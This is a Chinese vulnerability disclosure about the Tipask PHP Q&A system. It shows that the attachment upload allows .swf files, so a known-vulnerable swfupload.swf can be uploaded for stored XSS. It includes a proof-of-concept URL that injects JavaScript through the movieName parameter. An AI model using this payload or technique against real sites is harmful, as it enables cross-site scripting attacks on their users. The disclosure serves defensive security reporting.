### 简要描述:
Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念,采用MVC构架,系统具有速度快,SEO友好,界面操作简洁明快等特点。天极网、戴尔中国、WPS office等大型网站均采用了该系统。
### 详细说明:
Tipask问答系统在对用户提问的时候允许上传附件类型存在安全隐患:
文件 /control/attach.php
有如下代码:
```
function onupload() {
//上传配置
$config = array(
"uploadPath" => "data/attach/", //保存路径
"fileType" => array(".rar", ".doc", ".docx", ".zip", ".pdf", ".txt", ".swf", ".wmv", "xsl"), //文件允许格式
"fileSize" => 10 //文件大小限制,单位MB
);
```
虽是不允许上传html,但是却允许swf上传,那么我们就可以构造一个带有xss代码的swf上传之后访问,就能生成一个持久型的xss了。
### 漏洞证明:
发表一个问题,然后在上传的地方:上传一个带有缺陷的swf,这里我以swfupload.swf为例,大家都知道 swfupload.swf 老版本存在一个跨站漏洞。so。。
[<img src="https://images.seebug.org/upload/201406/1914323733ec100b101aeaf4b71755644d438af6.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1914323733ec100b101aeaf4b71755644d438af6.jpg)
然后构造好访问:
```
http://localhost/tipask/data/attach/1406/nMHzHAXB.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//
```
截图证明:
[<img src="https://images.seebug.org/upload/201406/19143336c96a08ac59556836961606b7d62d329e.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/19143336c96a08ac59556836961606b7d62d329e.jpg)
京公网安备 11010502034610号
暂无评论